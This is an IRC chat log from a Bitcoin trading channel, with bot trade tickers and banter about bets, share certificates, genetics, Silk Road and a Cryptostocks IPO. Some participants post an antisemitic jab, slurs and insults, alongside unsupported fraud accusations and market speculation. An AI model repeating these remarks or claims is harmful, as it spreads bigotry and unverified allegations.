23 05:23:03 <BingoBoingo> adis99: Do you have a better place to publish it? Oct 23 05:24:16 <adis99> well i didnt mean to make it private ;) Oct 23 05:24:49 <adis99> i dont mind if its unlocked or password published Oct 23 05:26:00 <BingoBoingo> adis99: I'm kind of wondering why they allowed such a puny bet to be protected from market forces. Oct 23 05:27:55 <assbot> [HAVELOCK] [AM1] 1 @ 0.611 BTC [-] Oct 23 05:40:07 <assbot> [HAVELOCK] [AM1] 1 @ 0.611 BTC [-] Oct 23 05:46:13 <assbot> [MPEX] [S.MPOE] 6000 @ 0.00084879 = 5.0927 BTC [-] {2} Oct 23 05:49:16 <assbot> [MPEX] [S.MPOE] 4912 @ 0.00085327 = 4.1913 BTC [+] {2} Oct 23 05:52:47 <adis99> sry lost internet Oct 23 05:53:35 <adis99> so you guys think Bitcoin price will go below 150 USD or not? Oct 23 05:55:03 <gecko_x2> absolutely Oct 23 05:55:19 <gecko_x2> after it goes to $2000 first Oct 23 05:55:52 <gecko_x2> maybe even NINE THOUSAND Oct 23 05:56:38 <gecko_x2> look mr. adis99 Oct 23 05:57:03 <gecko_x2> the mere fact that you ask this question practically guarantees the outcome Oct 23 05:57:13 <gecko_x2> by the laws of the universe Oct 23 05:57:23 <gecko_x2> but you dont know when Oct 23 05:57:30 <gecko_x2> that's the real question Oct 23 05:57:43 <gecko_x2> WHEN will it go to 150 Oct 23 05:57:51 <adis99> well let me specify, by the end of this year? Oct 23 05:58:02 <gecko_x2> and when it gores there, what will 150 mean? Oct 23 05:58:10 <gecko_x2> oh Oct 23 05:58:14 <gecko_x2> well. no. Oct 23 05:58:25 <gecko_x2> or maybe yes Oct 23 05:58:29 <adis99> how can you be sure? Oct 23 05:58:32 <gecko_x2> but then again, if that happens Oct 23 05:58:34 <adis99> ohh ok Oct 23 05:58:40 <gecko_x2> what will 150 be worth? Oct 23 05:58:44 <gecko_x2> what will it mean? Oct 23 05:58:48 <adis99> it that happens i win bet Oct 23 05:58:49 <adis99> :P Oct 23 05:58:56 <gecko_x2> will it equal 300 od today? Oct 23 05:58:58 <gecko_x2> or more? Oct 23 05:59:00 <gecko_x2> or less? Oct 23 05:59:07 <gecko_x2> you see Oct 23 05:59:24 <gecko_x2> in this life, everything you think will happen will happen Oct 23 05:59:35 <gecko_x2> because you are the life itself Oct 23 05:59:40 <gecko_x2> you see? Oct 23 05:59:45 <gecko_x2> now, i go for a smoke Oct 23 06:00:07 <adis99> i see, sounds like you a a philosopher ;) Oct 23 06:00:28 <assbot> [HAVELOCK] [VTX] 1 @ 0.39 BTC [-] Oct 23 06:00:45 <gecko_x2> no i just hate the illuminist black magicians Oct 23 06:06:34 <assbot> [HAVELOCK] [AM1] 8 @ 0.64737498 = 5.179 BTC [+] {2} Oct 23 06:07:35 <assbot> [HAVELOCK] [AM1] 10 @ 0.64889999 = 6.489 BTC [+] {4} Oct 23 06:08:35 <KRS1> oh god again Oct 23 06:08:57 <KRS1> dude go to #illuminati or something Oct 23 06:13:41 <assbot> [MPEX] [S.MPOE] 4000 @ 0.0008601 = 3.4404 BTC [+] Oct 23 06:15:43 <assbot> [HAVELOCK] [CBTC] 1825 @ 0.00014894 = 0.2718 BTC [+] Oct 23 06:16:31 <BingoBoingo> TheSeven: How is Amazing Labcoin Amazing along on Cryptostocks? Oct 23 06:20:57 <Kleeck_> Amazing, really. Oct 23 06:21:47 <BingoBoingo> Kleeck_: You try the Phuctor yet? Oct 23 06:22:25 <Kleeck_> No sir. Oct 23 06:22:35 <Kleeck_> How do I phuct the phuctor? Oct 23 06:32:51 <BingoBoingo> Kleeck_: First or Fist you have a GPG public key you paste into http://nosuchlabs.com then you bookmark it and return to check it periodically, and so the Phuctor works. Oct 23 06:33:11 <Kleeck_> Why do I care about Phuctor? Oct 23 06:33:18 <Kleeck_> aside from the awesome name? Oct 23 06:36:38 <BingoBoingo> Kleeck_: Because it offers a service that was wanted.I tells you if public keys were obviously weak. It is amazingly more valuable to test your correspondents keys than your own since encryption depends on theirs anyway. Oct 23 06:36:39 <assbot> AMAZING COMPANY! Oct 23 06:37:04 <assbot> [HAVELOCK] [AM1] 1 @ 0.6589 BTC [+] Oct 23 06:43:10 <assbot> [HAVELOCK] [NEOBEE] 55 @ 0.00199999 = 0.11 BTC [-] Oct 23 06:49:16 <assbot> [MPEX] [S.MPOE] 8550 @ 0.0008601 = 7.3539 BTC [+] Oct 23 06:51:47 <BingoBoingo> Luke-Jr: Any thoughts on Phuctor> Oct 23 07:09:36 <assbot> [MPEX] [S.MPOE] 3375 @ 0.00085504 = 2.8858 BTC [-] {2} Oct 23 07:21:48 <assbot> [HAVELOCK] [NEOBEE] 131 @ 0.002 = 0.262 BTC [+] Oct 23 07:44:10 <assbot> [HAVELOCK] [AM100] 511 @ 0.00568 = 2.9025 BTC [-] Oct 23 07:48:14 <assbot> [MPEX] [S.MPOE] 7839 @ 0.0008602 = 6.7431 BTC [+] {2} Oct 23 07:50:04 <nubbins`> http://imgur.com/aTkQXFa Oct 23 07:50:04 <ozbot> imgur: the simple image sharer Oct 23 07:50:07 <nubbins`> rough draft Oct 23 07:53:19 <nubbins`> idea is to make it look sort of similar to an old-style bearer bond Oct 23 07:53:26 <BingoBoingo> nubbins`: Maybe keep the GPG signed contracts in their native file format? Oct 23 07:53:51 <nubbins`> BingoBoingo: this is more for show than anything Oct 23 07:54:15 <BingoBoingo> nubbins`: Well, then. Oct 23 07:54:23 <nubbins`> this would be silkscreened onto nice 100% cotton paper Oct 23 07:55:17 <nubbins`> skeuomorphism at its finest :P Oct 23 07:57:23 <BingoBoingo> Beautiful nubbins` but generally cotton paper of archival quality is paired with ink to last rather than color to look good Oct 23 07:57:52 <nubbins`> i know, this is what i do for a living ;) Oct 23 07:57:55 <BingoBoingo> Silkscreening paper kind of sucks generally too. Oct 23 07:58:13 <nubbins`> you can silkscreen on any sort of paper. we use acid-free archival rag Oct 23 07:58:19 <Vexual> cute cert Oct 23 07:58:28 <nubbins`> speedball products, these are not :) Oct 23 07:59:41 <Vexual> are those hops leaves at the top? Oct 23 08:01:28 <assbot> [HAVELOCK] [HIM] 4 @ 0.07499999 = 0.3 BTC [-] Oct 23 08:01:35 <nubbins`> similar, but no Oct 23 08:03:18 <nubbins`> http://imgur.com/G4P4p3H Oct 23 08:03:18 <ozbot> imgur: the simple image sharer Oct 23 08:03:25 <nubbins`> "S.MG 2013" added to bottom Oct 23 08:03:47 <nubbins`> i wouldn't mind adding some of those spirograph-style curvy lines Oct 23 08:04:47 <Vexual> hops symbolise truth Oct 23 08:05:16 <Vexual> to me that is, im not offering some alternate history of the world Oct 23 08:07:20 <nubbins`> fun fact, hops and cannabis are members of the same family Oct 23 08:07:34 <assbot> [MPEX] [S.MPOE] 7711 @ 0.00085527 = 6.595 BTC [-] {2} Oct 23 08:07:47 <Vexual> i am aware of that fun fact Oct 23 08:08:05 <Vexual> only two known members of cannabe or whathaveyou Oct 23 08:08:35 <assbot> [MPEX] [S.MPOE] 517 @ 0.00085242 = 0.4407 BTC [-] Oct 23 08:09:40 <Vexual> i wonder if it was an ice age divergence? one being cold climate and one warm Oct 23 08:10:25 <nubbins`> who knows? interesting how they both ended up being enjoyed as intoxicants Oct 23 08:10:33 <Vexual> yes Oct 23 08:11:56 <Vexual> and vikinings tended to prefer ale where chinese preferred weed Oct 23 08:13:07 <Vexual> theres some symbiotic epigenetic unknown stuff happening there Oct 23 08:13:25 <nubbins`> i watched a documentary a while back that was about apples, tulips and weed Oct 23 08:13:58 <nubbins`> oh, and potatoes Oct 23 08:14:19 <nubbins`> on the surface, not much in common Oct 23 08:14:53 <Vexual> all been influenced by man? Oct 23 08:14:55 <nubbins`> but all have successfully spread from one small geographic area across the globe, because of their relationship to humans Oct 23 08:14:57 <nubbins`> exactly Oct 23 08:15:05 <nubbins`> http://video.pbs.org/program/botany-of-desire/ Oct 23 08:15:06 <ozbot> Botany of Desire | Watch Online | PBS Video Oct 23 08:15:39 <Vexual> genetic engineering of plants has done much less than so many generations of selective breeding Oct 23 08:16:40 <nubbins`> nod Oct 23 08:17:52 <Vexual> thats not to say new gene slpicing tools arent exciting Oct 23 08:19:04 <nubbins`> no, but the varieties that were around before genetic engineering could be said to have so far withstood the test of time, which isn't a trivial test Oct 23 08:19:11 <nubbins`> engineered varieties, who knows? Oct 23 08:19:25 <BingoBoingo> The only think more boring than watching grass grow just might be watching plants fuck. Oct 23 08:19:40 <nubbins`> i mean, it was what, a year ago? two? that it was suddenly announced "lel, whoops, BPA gives you cancer" Oct 23 08:19:46 <assbot> [HAVELOCK] [NEOBEE] 1297 @ 0.00190777 = 2.4744 BTC [-] {4} Oct 23 08:20:27 <nubbins`> when the "lel, whoops" has the ability to grow beyond a certain scope, it becomes much less of an attractive option, in my mind Oct 23 08:20:46 <nubbins`> which is why i'm cautious about my optimism towards engineering Oct 23 08:21:31 <nubbins`> or any number of things. lel, whoops, 30,000kg of hamburger meat recalled because we contaminated it with e. coli! Oct 23 08:22:33 <Vexual> dna is a tricky machine Oct 23 08:22:40 <nubbins`> the trickiest Oct 23 08:23:06 <Vexual> probably the coolest too Oct 23 08:23:17 <nubbins`> it's pure hubris to assume you can fully understand the results of manipulating such a complex thing Oct 23 08:23:20 <nubbins`> yeah Oct 23 08:24:12 <Vexual> im out of touch with current tools for mapping genes Oct 23 08:25:21 <nubbins`> it's been so long since i even touched up on the basics, all i have left now are opinions :P Oct 23 08:25:36 <Vexual> same Oct 23 08:26:42 <Vexual> ive got half a memory of some cool shit happening that ive blocked to avoid becoming a mad scientist Oct 23 08:26:53 <assbot> [HAVELOCK] [AM1] 7 @ 0.61428574 = 4.3 BTC [-] {3} Oct 23 08:28:03 <Vexual> i remember now, theres on open source software package where you can create dna with object oriented visual language Oct 23 08:28:33 <Vexual> and you can get it printed Oct 23 08:29:25 <Vexual> i think they check its not airbourne swineflu or whatever Oct 23 08:30:21 <nubbins`> what! Oct 23 08:30:31 <Vexual> too many splices gets very expensive if memory serves Oct 23 08:30:50 <nubbins`> insane Oct 23 08:31:06 <Vexual> its loaded with a lot of known outcomes i think Oct 23 08:34:04 <Vexual> yeah genetics is still going places, people forget Oct 23 08:34:26 <mircea_popescu> nubbins` haha investry Oct 23 08:34:38 <nubbins`> right?! Oct 23 08:38:54 <Vexual> ive sent my dna to every lab in the us Oct 23 08:40:13 <mircea_popescu> of course it could not really be made into a real bearer bond... Oct 23 08:40:14 <mircea_popescu> hm! Oct 23 08:40:21 <nubbins`> oh no, of course Oct 23 08:40:24 <Vexual> apparently im susceptable to alcoholism Oct 23 08:40:26 <mircea_popescu> unless, of course, it came as a cardano. in which case it COULD be a bearer instrument Oct 23 08:41:04 <nubbins`> Vexual: now you can't hash the result and use it as a brainwallet to store all your funds. Oct 23 08:41:18 <nubbins`> home sequencing is the way to go ;p Oct 23 08:41:22 <Vexual> they're out there now tho Oct 23 08:41:24 <mircea_popescu> linked by imgur to nubbins` investry http://imgur.com/gallery/oZRUE Oct 23 08:41:34 <Vexual> at least i have plausable deniability Oct 23 08:41:41 <nubbins`> ^ Oct 23 08:41:58 <Vexual> shopped Oct 23 08:42:07 <nubbins`> also linked, http://imgur.com/gallery/Tv68u Oct 23 08:42:35 <nubbins`> "overall, i turned my life around" Oct 23 08:42:39 <Vexual> needs shopping Oct 23 08:43:50 <mircea_popescu> he's gay now ? Oct 23 08:44:39 <nubbins`> i feel like there's a pun hiding in the last picture, but i can't quite find it Oct 23 08:46:54 <nubbins`> mircea_popescu: more of a fancy paper wallet than anything. cardanos as bearer bonds is an interesting idea though Oct 23 08:47:11 <nubbins`> imagine! Oct 23 08:47:59 <Vexual> hey mp, if i start a genetics lab that does splices for btc, can i float for free on mpes? Oct 23 08:48:26 <nubbins`> heh Oct 23 08:49:00 <Vexual> it will be an ongoing concern from the outset, repleat with bespectacled korean hotties Oct 23 08:51:16 <assbot> [MPEX] [S.MPOE] 1098 @ 0.00085438 = 0.9381 BTC [+] Oct 23 08:52:17 <assbot> [MPEX] [S.MPOE] 910 @ 0.00085645 = 0.7794 BTC [+] Oct 23 08:56:21 <assbot> [HAVELOCK] [HIM] 2 @ 0.07200001 = 0.144 BTC [-] Oct 23 08:59:17 <nubbins`> okay, time to sleep Oct 23 08:59:24 <assbot> [HAVELOCK] [AM1] 10 @ 0.60969998 = 6.097 BTC [-] {6} Oct 23 08:59:28 <Vexual> ithe ipo money would be to install a manager and lab the fuck out of that shit Oct 23 09:01:27 <assbot> [HAVELOCK] [AM100] 250 @ 0.00566349 = 1.4159 BTC [-] {5} Oct 23 09:01:52 <BingoBoingo> I can't believe I haven't though of abusing Cardanos into bearer bonds yet. Oct 23 09:02:20 <Vexual> maybe put a petent lawyer on the books Oct 23 09:02:28 <assbot> [HAVELOCK] [AM1] 2 @ 0.6 = 1.2 BTC [-] Oct 23 09:07:34 <Vexual> i just saw a gecko hiding behind my toilet cistern, hows that for imagry? Oct 23 09:09:35 <assbot> [HAVELOCK] [NEOBEE] 201 @ 0.00199999 = 0.402 BTC [+] Oct 23 09:09:50 <Vexual> a crazy psychiatris wrote a long book, and a normal human is expected to see a penis where a skyscraper is? Oct 23 09:11:47 <BingoBoingo> Vexual: Lawyers aren't that worth that much or I would have hired one without a drive through for their office. Oct 23 09:12:51 <Vexual> patent lawyers are gold bullion Oct 23 09:13:19 <Vexual> by volume Oct 23 09:14:00 <BingoBoingo> I'm not sure Vexual, I mean we are all pink on the inside... Oct 23 09:14:24 <Vexual> true enough, and time marches on Oct 23 09:15:06 <Vexual> but money is money Oct 23 09:15:16 <Vexual> as the finance experts will tell you Oct 23 09:15:56 <Vexual> and most is what is true of dollars is true of bitcoin Oct 23 09:17:20 <Vexual> *for Oct 23 09:19:38 <Vexual> bitcoin is still in the real of philosiphers Oct 23 09:19:51 <Vexual> not yet a science Oct 23 09:19:56 <Vexual> perhaps an art Oct 23 09:21:16 <Vexual> you can copy paste something from wikipedia, or imagine it through the eyes of your favourite ancient author Oct 23 09:22:58 <Vexual> but money talks and bullshit walks, as willful man will tell Oct 23 09:25:37 <Vexual> for those who are unfamiliar with the internation, ill give you this piece Oct 23 09:25:51 <assbot> [MPEX] [S.MPOE] 4633 @ 0.00085234 = 3.9489 BTC [-] {2} Oct 23 09:25:51 <assbot> [HAVELOCK] [AM100] 100 @ 0.0057 = 0.57 BTC [+] Oct 23 09:26:48 <Vexual> ive rode a wild bull round round a yard to win a five pound bet Oct 23 09:27:05 <Vexual> but this is sure the derndest ride that ive encountered yet Oct 23 09:27:41 <Vexual> ill give that two wheeled outlaw best, it's shaken all my nerve Oct 23 09:28:19 <Vexual> To feel it whistle through the air and plunge and buck and swerve Oct 23 09:28:53 <Vexual> but what ill sit while hide will hold and girths and straps are tight Oct 23 09:29:23 <Vexual> i'll ride this here two wheeled concern right straight away at sight Oct 23 09:29:55 <assbot> [MPEX] [S.MPOE] 2550 @ 0.00084647 = 2.1585 BTC [-] Oct 23 09:32:07 <Vexual> http://www.youtube.com/watch?v=t9mxhayU7GA Oct 23 09:32:07 <ozbot> Damian "Jr Gong" Marley - Old War Chant (Mr. Marley) - YouTube Oct 23 09:33:59 <assbot> [HAVELOCK] [AM100] 66 @ 0.0058 = 0.3828 BTC [+] Oct 23 09:36:31 <BingoBoingo> I guess I'll warn anyone invested in Bitcoinsports.eu that this is an active betslip I own http://bitcoinsports.eu/bet/6d7fa?destination=bet-slip Oct 23 09:40:02 <Vexual> i just got an unusual sign of regression Oct 23 09:40:31 <Vexual> but i doubt its related to the bitcoin dollar price Oct 23 09:41:14 <Vexual> it was a bird i havent seen for a year Oct 23 09:42:09 <Vexual> always tied in two Oct 23 09:42:15 <Vexual> she shat on the floor Oct 23 09:45:10 <Vexual> then she took off on black and white wings Oct 23 09:51:44 <Vexual> http://www.youtube.com/watch?v=6SJFaUqwuQY Oct 23 09:51:45 <ozbot> Afroman - Hungry Hustler - YouTube Oct 23 09:56:02 <BingoBoingo> Vexual: Bitcoin Dollar price will be irrelevant in not less than a year. Before long the importance will reverse. Oct 23 09:56:20 <Vexual> thats why i have no idea how to sell Oct 23 09:56:32 <Vexual> ill wait til i can buy something i want Oct 23 09:56:52 <BigBitz> I will buy your coin from you :) Oct 23 09:57:16 <Vexual> you got a large parcel of fruitful land? Oct 23 09:57:27 <Vexual> http://www.youtube.com/watch?v=NZyVZFJGX5g Oct 23 09:57:27 <ozbot> Black Sabbath - Paranoid(1970 - Music Video) - YouTube Oct 23 09:57:35 <BigBitz> I do not. I have cash :) Oct 23 09:57:54 <Vexual> if its usd, you can save your keyboard strokes Oct 23 09:58:06 <BigBitz> USD lol Oct 23 09:58:09 <BigBitz> GBP ftw Oct 23 09:58:20 <Vexual> yuan perhaps Oct 23 09:58:33 <BigBitz> Sure I can get you JPY :) Oct 23 09:58:45 <Vexual> fuck off with your fake money Oct 23 09:59:04 <BigBitz> ... Oct 23 09:59:19 <Vexual> no really im not selling Oct 23 09:59:43 <BigBitz> keep holding. Oct 23 09:59:47 <BigBitz> keep strong. Oct 23 09:59:56 <Vexual> im looking for some nice acres, anywhere Oct 23 10:00:15 <BigBitz> you must have a lot of bitcoin :) Oct 23 10:00:33 <Vexual> 2 bitcoin will buy a nice acxre in 10 years Oct 23 10:01:01 <BigBitz> Hopefully :) Oct 23 10:01:03 <BigBitz> bbl. Oct 23 10:01:27 <Vexual> at todays land prices Oct 23 10:02:11 <Vexual> more billion humans gonna want more food Oct 23 10:03:14 <Vexual> life gets cheaper, prices get steeper, that s the future boys Oct 23 10:05:46 <BingoBoingo> I'll be honest. I would part with some coin soon for a Dodge Stealth in decent condition. Oct 23 10:06:11 <Vexual> :) Oct 23 10:06:52 <Vexual> sounds nice Oct 23 10:07:34 <BingoBoingo> Vexual: The thing is I'd have to find the sort of redneck who has both a Dodge Stealth to sell and an awareness of what Bitcoin is. Oct 23 10:07:34 <Vexual> http://www.youtube.com/watch?v=cnYiQ2FVG8I Oct 23 10:07:34 <ozbot> The Black Eyed Peas - Weekend ft. Esthero - YouTube Oct 23 10:08:49 <Vexual> nice cars are tempting, but they dont make income aunless one is a limo driver Oct 23 10:09:30 <Vexual> im not rich enough to spend 30k on 4 wheels Oct 23 10:10:42 <Vexual> i like to keep a car with no ecu in case of emp Oct 23 10:12:58 <Vexual> also incase real style is required Oct 23 10:15:11 <Vexual> buy an old 70's mustang and make it nice with extra money you stupid american fuck Oct 23 10:17:45 <Vexual> a two door 70s ford is no less than 50 in australia Oct 23 10:18:53 <Vexual> http://www.youtube.com/watch?v=r5QYYlfXQFk Oct 23 10:18:53 <ozbot> Mad Max chase - YouTube Oct 23 10:19:44 <assbot> [HAVELOCK] [HIM] 10 @ 0.075 = 0.75 BTC [+] Oct 23 10:21:46 <assbot> [HAVELOCK] [B] [XBOND] 1000 @ 0.00114889 = 1.1489 BTC [-] Oct 23 10:23:48 <assbot> [HAVELOCK] [HIM] 5 @ 0.075 = 0.375 BTC [+] Oct 23 10:26:51 <assbot> [HAVELOCK] [B] [XBOND] 500 @ 0.00114889 = 0.5744 BTC [-] Oct 23 10:28:53 <assbot> [HAVELOCK] [B] [XBOND] 101 @ 0.00114889 = 0.116 BTC [-] Oct 23 10:30:56 <assbot> [MPEX] [S.MPOE] 7781 @ 0.00084458 = 6.5717 BTC [-] Oct 23 10:38:02 <assbot> [HAVELOCK] [AM1] 3 @ 0.62989997 = 1.8897 BTC [+] Oct 23 10:46:10 <assbot> [HAVELOCK] [AM1] 3 @ 0.62989997 = 1.8897 BTC [+] Oct 23 10:47:11 <assbot> [HAVELOCK] [AM1] 1 @ 0.62989997 BTC [+] Oct 23 10:51:15 <assbot> [MPEX] [S.MPOE] 5529 @ 0.00084544 = 4.6744 BTC [+] {2} Oct 23 11:01:27 <assbot> [HAVELOCK] [DEALCO] 19 @ 0.0079 = 0.1501 BTC [-] Oct 23 11:27:52 <assbot> [HAVELOCK] [HIM] 5 @ 0.075 = 0.375 BTC [+] Oct 23 11:31:56 <assbot> [HAVELOCK] [B] [XBOND] 492 @ 0.00114889 = 0.5653 BTC [-] {3} Oct 23 11:34:59 <assbot> [HAVELOCK] [AM1] 11 @ 0.62982726 = 6.9281 BTC [-] {3} Oct 23 11:48:12 <assbot> [HAVELOCK] [B] [XBOND] 342 @ 0.00109767 = 0.3754 BTC [-] {10} Oct 23 12:25:49 <assbot> [HAVELOCK] [AM100] 105 @ 0.00565657 = 0.5939 BTC [-] Oct 23 12:41:04 <assbot> [HAVELOCK] [CBTC] 17236 @ 0.00014718 = 2.5368 BTC [+] {4} Oct 23 12:49:12 <assbot> [HAVELOCK] [AM1] 1 @ 0.62998 BTC [+] Oct 23 12:54:17 <assbot> [MPEX] [S.MPOE] 3150 @ 0.00084324 = 2.6562 BTC [-] Oct 23 13:00:23 <assbot> [HAVELOCK] [B] [XBOND] 95 @ 0.00108501 = 0.1031 BTC [-] Oct 23 13:20:44 <assbot> [HAVELOCK] [NEOBEE] 500 @ 0.002 = 1 BTC [+] Oct 23 13:21:41 <jurov> http://www.reddit.com/r/SilkroadUNcensored/comments/1p0ogt/time_to_let_the_cat_out_of_the_hat/ Oct 23 13:21:42 <ozbot> Time to let the cat out of the hat. : SilkroadUNcensored Oct 23 13:22:17 <jurov> another lulzy piece how proactive is btc community toward scammers, silkroad edition Oct 23 13:23:37 <jurov> and much more Oct 23 13:23:58 <davout> jurov: scam hunting is good Oct 23 13:24:03 <davout> it keeps retards busy Oct 23 13:24:33 <mircea_popescu> jurov interesting. Oct 23 13:24:48 <assbot> [HAVELOCK] [B] [XBOND] 100 @ 0.00108501 = 0.1085 BTC [-] Oct 23 13:26:41 <mircea_popescu> What was even more interesting, was that the notice used a high quality logo unable to be found by anyone else despite an hour of searching, until a random user popped in and said “I found it in 2 minutes by using Google.“ No, you did not. I spent 30 minutes staring at Google images, and I found nothing. Oct 23 13:27:02 <mircea_popescu> funny how the dork mind works. "i can't do shit therefore shit can't be done stop lying to me!!11" Oct 23 13:27:24 <davout> "His nose is constantly being edited." --> the jews, always the jews Oct 23 13:27:46 <mircea_popescu> "The mouth which comes from this photo is one shameful mistake." whay ?! Oct 23 13:27:57 <mircea_popescu> was silkroad built atop a hill ? Oct 23 13:29:53 <mircea_popescu> anyway, the "wrong guy" suspicions aren't entirely without merit, even if reddit makes a typically redditarded soup out of it. Oct 23 13:31:55 <mircea_popescu> "The FBI has not made a single official comment via any of their press channels. The FBI media relations team has updated nearly every day before" ahahah forum mentality, i think the government is a scam because it hasn't posted in the thread for a week!!1 Oct 23 13:48:10 <assbot> [HAVELOCK] [B] [XBOND] 258 @ 0.00108 = 0.2786 BTC [-] {3} Oct 23 14:00:30 <KRS1> heh Oct 23 14:02:46 <KRS1> is bitkoins.com really the #1 Bitcoin news and forum site Oct 23 14:05:50 <mircea_popescu> totally. Oct 23 14:06:32 <mircea_popescu> godaddy domain Registered On March 30, 2013. so it has to be. Oct 23 14:09:32 <assbot> [HAVELOCK] [AM1] 2 @ 0.62998 = 1.26 BTC [+] Oct 23 14:09:33 <KRS1> never heard of it heh Oct 23 14:11:40 <krlbrgmn> mircea_popescu re: http://trilema.com/2013/things-that-matter-these-days-things-that-dont-matter-these-days/ "A good chunk of the recent hashpower is split roughly evenly between the Chinese and the US government." Oct 23 14:11:53 <krlbrgmn> mircea_popescu can you please give more hints? Oct 23 14:13:36 <assbot> [MPEX] [S.MPOE] 5400 @ 0.00083981 = 4.535 BTC [-] Oct 23 14:28:40 <KRS1> you might have to ask him for a complimentary Trilema subscription, there are hints in there from time to time. Oct 23 14:32:55 <assbot> [MPEX] [S.MPOE] 2250 @ 0.00084216 = 1.8949 BTC [+] Oct 23 14:46:08 <assbot> [HAVELOCK] [AM1] 1 @ 0.611 BTC [-] Oct 23 14:48:10 <assbot> [HAVELOCK] [NEOBEE] 1000 @ 0.002 = 2 BTC [+] {2} Oct 23 14:50:58 <mircea_popescu> krlbrgmn not atm Oct 23 14:51:11 <kakobrekla> http://imgur.com/2ISD5dB Oct 23 14:51:11 <ozbot> ...I accept nothing. - Imgur Oct 23 14:51:13 <assbot> [MPEX] [S.MPOE] 2800 @ 0.00084287 = 2.36 BTC [+] {3} Oct 23 14:52:10 <mircea_popescu> good one Oct 23 14:59:41 <mircea_popescu> <BingoBoingo> adis99: I'm kind of wondering why they allowed such a puny bet to be protected from market forces. << mod just forgot private bets need 10btc in zeroconf. Oct 23 15:00:22 <assbot> [HAVELOCK] [AM100] 19 @ 0.00566 = 0.1075 BTC [-] Oct 23 15:00:23 <assbot> [HAVELOCK] [XBOND] [PAID] 0.69348300 BTC to 1`386`966 shares, 50 satoshi per share Oct 23 15:16:39 <assbot> [HAVELOCK] [NEOBEE] 358 @ 0.002 = 0.716 BTC [+] Oct 23 15:21:44 <assbot> [MPEX] [S.MPOE] 5150 @ 0.00083975 = 4.3247 BTC [-] {2} Oct 23 15:31:54 <assbot> [MPEX] [S.MPOE] 1300 @ 0.00084452 = 1.0979 BTC [+] Oct 23 15:35:57 <assbot> [MPEX] [S.MPOE] 5400 @ 0.00083917 = 4.5315 BTC [-] {2} Oct 23 15:47:59 <kakobrekla> Sorry kakobrekla, you are banned from posting or sending personal messages on this forum. Oct 23 15:47:59 <kakobrekla> Reposting deleted posts (60 days) Oct 23 15:48:53 <kakobrekla> you know, i wouldnt have to be reposting if the idiots wouldnt be deleting. Oct 23 15:49:31 <kleeck> http://www.sadtrombone.com/?play=true Oct 23 15:49:32 <ozbot> Sad Trombone Oct 23 15:49:40 <pankkake> Congratulations! Oct 23 15:51:28 <kakobrekla> thanks! Oct 23 15:52:01 <davout> being banned from the forums sounds like a promotion! Oct 23 15:52:48 <kleeck> Yeah... reposting. SO HARD. SO NOBLE. Oct 23 15:53:08 <TomServo> !jd Oct 23 15:53:10 <assbot> Just-Dice stat: 5405 BTC profit, 59.2k BTC invested, 197.69 mio bets, 4.24 mio BTC wagered Oct 23 15:54:44 <kakobrekla> deleting a scam accusation makes the deleter an accomplice/shill Oct 23 15:55:17 <assbot> [HAVELOCK] [AM1] 10 @ 0.6101 = 6.101 BTC [-] Oct 23 16:05:19 <samson_> I see Cryptsy.com is offering 100,000 shares (20% of company) on cryptostocks.com in an IPO with no expiry date for 0.05 BTC each - listed yesterday by the looks of it Oct 23 16:06:05 <pankkake> altcoins dying? time to sell the company! Oct 23 16:06:19 <Apocalyptic> ^^ Oct 23 16:06:37 <VanCleef> i only invest in PIF and Amythest Oct 23 16:06:39 <samson_> Apparently they are going to apply for licensing so they can sell coins for USD Oct 23 16:06:44 <samson_> All coins including BTC Oct 23 16:06:56 <pankkake> and they value themselves at 25000 BTC, sure :) Oct 23 16:07:00 <samson_> never mind the alts - it's a way into BTC Oct 23 16:07:09 <samson_> Well that's the issue - it looks a bit overpriced Oct 23 16:07:29 <assbot> [HAVELOCK] [AM100] 90 @ 0.00566001 = 0.5094 BTC [+] {2} Oct 23 16:07:42 <pankkake> I don't even see how they are going to complete raising 5000 BTC Oct 23 16:07:48 <samson_> me neither Oct 23 16:08:32 <pankkake> worst of all, why aren't they using their own websites to sell the shares? Oct 23 16:08:40 <samson_> I would normally buy some as the value would probably go up anyway but with no end date listed for the IPO price they might not sell all 100,000 and that would fix the price Oct 23 16:09:03 <Apocalyptic> pankkake, the part where most bitcoin people seem to fail the most is company/assets valuation Oct 23 16:09:48 <samson_> I bought some ASICMINER shares just over a year ago, that was the last time I invested in any assets - that wasn't so bad Oct 23 16:10:42 <bitesak> http://www.youtube.com/watch?v=l02E4cj4Vvo#t=49 Oct 23 16:10:43 <ozbot> "I Support an Orwellian Police State in America" - YouTube Oct 23 16:10:51 <bitesak> the futures bright ! Oct 23 16:11:47 <samson_> lol Oct 23 16:29:51 <assbot> [MPEX] [S.MPOE] 2950 @ 0.00084452 = 2.4913 BTC [+] Oct 23 16:37:59 <assbot> [HAVELOCK] [AM1] 40 @ 0.604975 = 24.199 BTC [-] {6} Oct 23 16:39:00 <assbot> [HAVELOCK] [AM100] 296 @ 0.00565845 = 1.6749 BTC [-] {7} Oct 23 16:45:06 <assbot> [HAVELOCK] [AM100] 151 @ 0.00553028 = 0.8351 BTC [-] {9} Oct 23 17:13:32 <taub> btcn more volume than gox and bitstamp last 24h ! Oct 23 17:13:45 <taub> are chinamen pushing the price ralley? Oct 23 17:13:55 <Apocalyptic> yes they are obviously Oct 23 17:14:02 <mircea_popescu> kakobrekla what forum is this ? Oct 23 17:14:35 <assbot> [HAVELOCK] [AM1] 10 @ 0.594304 = 5.943 BTC [-] {5} Oct 23 17:14:43 <mircea_popescu> samson_ you know tjhe story of the fraudulent ipo of cryptostocks itself righ ? Oct 23 17:15:17 <kleeck> Chinese Government is pushing BTC to destablize the USD further and have stronger grounds to push BRIC away from the USD. Oct 23 17:15:18 <Apocalyptic> i don't mircea, tell me Oct 23 17:15:39 <kleeck> /tinfoil hat Oct 23 17:15:49 <mircea_popescu> well basically the guy made an ipo of his own site, which included a hefty licensing fee to be paid to himself Oct 23 17:16:22 <mircea_popescu> the deal got altered after the ipo so as to vacuum most value from the supposed "investors" Oct 23 17:16:31 <mircea_popescu> it's all over the forum, see his ipo thread Oct 23 17:16:47 <mircea_popescu> provided kakobrekla didn't delete all the posts meanwhile, of course. Oct 23 17:17:03 <Apocalyptic> why would kako do that ? Oct 23 17:17:27 <mircea_popescu> kleeck yeah, totally, bric needs more reasons to move away from usd. the chinese also summoned the us ambasador in paris, i bet. Oct 23 17:17:45 <mircea_popescu> Apocalyptic it's a joke, kakobrekla was complaining above he got banned for reposting deleted posts. Oct 23 17:18:04 <mircea_popescu> obviously it'd be the forum administration deleting old smoking gun posts, not kakobrekla Oct 23 17:18:06 <Apocalyptic> ok, i've been out of the loop for a while Oct 23 17:18:13 <Apocalyptic> gotta catch up Oct 